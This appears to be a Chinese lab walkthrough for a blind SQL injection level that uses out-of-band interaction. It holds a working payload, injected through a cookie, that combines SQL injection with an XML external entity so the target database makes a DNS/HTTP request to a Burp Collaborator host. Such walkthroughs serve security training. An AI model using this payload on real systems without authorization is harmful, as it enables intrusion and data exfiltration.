第十六关 带外交互的盲 SQL 注入
这一关就是通过SQL注入和XML外部实体(XXE)结合,诱使目标数据库服务器访问你指定的外部URL(通常是Burp Collaborator生成的子域名),触发带外交互
提示:1、存在sql盲注,注入点在cookie
2、利用sql注入漏洞导致对 Burp Collaborator 进行 DNS 查找
具体操作
1、让burp Collaborator先生成一个子域名
2、插入SQL注入和xxe外部实体注入结合的语句
' UNION SELECT EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//y98h5z10oi6kykqjayl079dzwq2kqaez.oastify.com/">+%25remote%3b]>'),'/l') FROM dual--
解释:目标的数据库服务器解析payload中的XML数据,试图访问你的Burp Collaborator子域名
其中:
http%3a//y98h5z10oi6kykqjayl079dzwq2kqaez.oastify.com/
y98h5z10oi6kykqjayl079dzwq2kqaez.oastify.com:这个填写的是burp Collaborator生成的子域名
EXTRACTVALUE函数(MySQL 和 Oracle 数据库):解析XML数据并提取指定节点的值
3、再去查看Burp的Collaborator界面看到有一次DNS或HTTP请求,证明外带成功,目标存在此类高危漏洞。
4、如图回到靶场,页面显示正常,靶场过关
